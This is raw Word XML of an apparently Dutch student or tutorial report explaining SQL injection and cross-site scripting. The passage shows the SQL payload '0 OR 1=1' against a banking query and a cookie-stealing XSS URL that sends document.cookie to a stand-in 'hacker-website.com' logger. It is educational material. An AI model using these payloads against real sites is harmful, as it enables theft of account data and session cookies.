                <wp:docPr id="849" name="Rectangle 8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2FF97" id="Rectangle 849" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-80pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CF3AE8">
        <w:t>SQL injectie voorbeeld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609727B0" w14:textId="0A172BA1" w:rsidR="00CF3AE8" w:rsidRPr="000E3B41" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3B41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Meer data teruggeven dan verwacht</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA6B26" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>In dit voorbeeld wilt de ontwikkelaar het accountnummer en balans tonen van de gebruiker die op dat moment is ingelogd. Om de gebruikersdata op te kunnen vragen wordt de gebruikers ID opgestuurd als argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D4CF9" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33BF2E2F" wp14:editId="485B93B8">
            <wp:extent cx="5760720" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="842"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9">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578EC0D3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A884CBA" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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Pr="00FC4851">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>https://onlinebankeren/balans?userId=487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F42886" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>De SQL-query die uitgevoerd zou worden zal dan zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C39C49" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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394F5CE2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Deze SQL-query zal door de database uitgevoerd worden en het accountnummer en balans van eindgebruiker 487 zal op de website getoond worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB2511" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="006B346C" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B9C449" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Het exploiteren van dit voorbeeld is niet moeilijk, de aanvaller/hacker hoeft alleen maar te weten dat de input van de eindgebruikers niet schoon wordt gemaakt (sanitize) van verkeerde data. De globale variabele </w:t>
      </w:r>
      <w:r w:rsidRPr="005969BB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  op regel 3 (figuur 3.3) wordt zonder voorzorgmaatregelingen er in geplaatst en uitgevoerd. Dit betekent dat de aanvaller/hacker SQL-injecties kan uitvoeren. Een veelgebruikte SQL-injectie is: 0 OR 1=1, wat resulteert naar de SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABE676" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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2EB4EA5A" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve">Als deze SQL-query wordt uitgevoerd dan zal het alle accountgegevens teruggeven die in de database opgeslagen staan. </w:t>
      </w:r>
      <w:r>
        <w:t>De aanvaller/hacker heeft nu het accountnummer en balansgegevens van alle gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F3BFC" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Voorbeeld van een XSS-aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD22B7" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">De anatomie van een XSS-aanval bestaat uit een webapplicatie waarop ongecodeerde en niet gevalideerde gebruikers input geplaats kan worden en een webbrowser die het de programmeertaal javascript kan interpreteren en runnen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C299D2C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Ik zal zoals bij de SQLi een case aantonen hoe schadelijk XSS kan zijn voor gebruikers. In deze case zal de hacker een cookie stelen met waardevolle data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048980D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BCCC20" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC9EC86" w14:textId="1BBB12BF" w:rsidR="00474843" w:rsidRDefault="00474843" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF00F7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253276160" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A3638F3" wp14:editId="6E61FB1B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1012112</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="850" name="Rectangle 8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C6738" id="Rectangle 850" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-79.65pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00EF00F7">
        <w:t>XSS voorbeelden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73630F47" w14:textId="72CAEFE4" w:rsidR="009F51E0" w:rsidRDefault="006F62BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253347840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="584D9A6D" wp14:editId="417DD437">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-201930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>841375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6545580" cy="4348480"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="897"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45580" cy="4348480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009F51E0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAD8E6" w14:textId="3A1817EE" w:rsidR="000F5D03" w:rsidRPr="000F5D03" w:rsidRDefault="009F51E0" w:rsidP="000F5D03">
      <w:r w:rsidRPr="00EF00F7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253349888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79D5F542" wp14:editId="2F55DC8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896951</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-601388</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="898" name="Rectangle 89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EB0EA" id="Rectangle 898" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.65pt;margin-top:-47.3pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F80E4" w14:textId="70384766" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Simpele cookie ste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8097D8" w14:textId="17214F68" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">In dit voorbeeld wordt er een XSS-aanval via de adresbalk uitgevoerd. De website vraagt om de gebruikersnaam (username) van een gebruiker zodat het op de website kan worden uitgeprint als hyperlink. De gebruiker is ingelogd met zijn account en maakt gebruik van een sessie ID. Deze sessie ID’s worden door de browser opgeslagen in een cookie bestand dat op de lokale systeem van het slachtoffer wordt geplaatst.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E44C3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3EE117" wp14:editId="134E3B1A">
            <wp:extent cx="5760720" cy="643890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="84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50">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5AB0BA17" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFE89C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00367610" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253265920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B3DFEC8" wp14:editId="54640A2F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>22860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3437255" cy="1057910"/>
                <wp:effectExtent l="0" t="0" r="10795" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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79EBBFBA" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6427483E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003F2F0E">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="520B4E29" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="16C25A5B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Output:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39111845" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00771C98" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00771C98">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Hi Tom!</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FDCE648" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE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DFEC8" id="_x0000_s1265" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:.85pt;width:270.65pt;height:83.3pt;z-index:2532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" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="79EBBFBA" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6427483E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003F2F0E">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="520B4E29" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="16C25A5B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Output:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39111845" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00771C98" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00771C98">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Hi Tom!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FDCE648" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00367610" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB83DC" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="762E6AEE" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="6DC92EC2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="5A13C3E2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253266944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CE78A83" wp14:editId="43CB317B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>450850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5593715" cy="907415"/>
                <wp:effectExtent l="0" t="0" r="19685" b="32385"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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907415"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="50000"/>
                              <a:lumOff val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="387B427B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6BB238DB" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                            <w:r w:rsidRPr="00160FF3">
                              <w:t>http://www.voorbeeld-xss.nl?username=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&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78A83" id="_x0000_s1266" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:35.5pt;width:440.45pt;height:71.45pt;z-index:2532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" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="387B427B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6BB238DB" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">
                      <w:r w:rsidRPr="00160FF3">
                        <w:t>http://www.voorbeeld-xss.nl?username=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&lt;/script&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>In dit scenario weet de hacker dat de website kwetsbaar is tegen XSS aanvallen. De hacker bouwt een URL op die hij door de slachtoffer laat uitvoeren. De URL bestaat uit vier delen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E953C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EFB9AC" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BFFA5C" w14:textId="3A2193E4" w:rsidR="00CF3AE8" w:rsidRPr="00A02127" w:rsidRDefault="00272FA3" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253278208" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A07CC61" wp14:editId="2E0D7D08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-901952</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="851" name="Rectangle 85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EC04F" id="Rectangle 851" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-70.95pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CF3AE8" w:rsidRPr="00A02127">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Structuur van URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F473EA" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. URL plus de query username van de website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F9F57" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.  HTML script element met de javascript Windows.location.href</w:t>
      </w:r>
      <w:r w:rsidRPr="00997215">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60A372" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. de URL van de hackers website met als query cookie en als waarde het cookie van het slachtoffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B3A41" w14:textId="58EA934B" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A6DAC1" w14:textId="3B2398AE" w:rsidR="00CF3AE8" w:rsidRPr="006B346C" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502303CA" w14:textId="067E987C" w:rsidR="00CF3AE8" w:rsidRPr="00D327A4" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D327A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voorwaarden</w:t>
      </w:r>
